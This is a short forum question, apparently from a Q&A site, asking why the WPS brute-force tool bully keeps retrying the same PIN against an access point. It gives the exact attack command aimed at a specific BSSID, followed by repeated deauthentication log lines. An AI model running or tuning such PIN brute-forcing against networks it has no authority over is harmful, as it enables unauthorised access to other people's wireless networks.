# Bully stuck on same pin?

Tags: linux, wireless-access-point, kali-linux, brute-force, wps

BUlly is trying the same pin again and again why is that. Should i try differnet option suggest me. THE AP i'm bruteforcing has wps lock turned off i check it several times using wash.
Command used

```
bully -b C8:3A:35:2C:4E:C9 -c 4 -v 3 mon0
```

log out put

```
[!] Received disassociation/deauthentication from the AP
[+] Rx( Auth ) = 'NoAssoc'   Next pin '07093685'
[!] Received disassociation/deauthentication from the AP
[+] Rx(  ID  ) = 'NoAssoc'   Next pin '07093685'
[!] Received disassociation/deauthentication from the AP
[+] Tx( Auth ) = 'NoAssoc'   Next pin '07093685'
[!] Received disassociation/deauthentication from the AP
[+] Tx( Auth ) = 'NoAssoc'   Next pin '07093685'
[!] Received disassociation/deauthentication from the AP
[+] Tx( Auth ) = 'NoAssoc'   Next pin '07093685'
```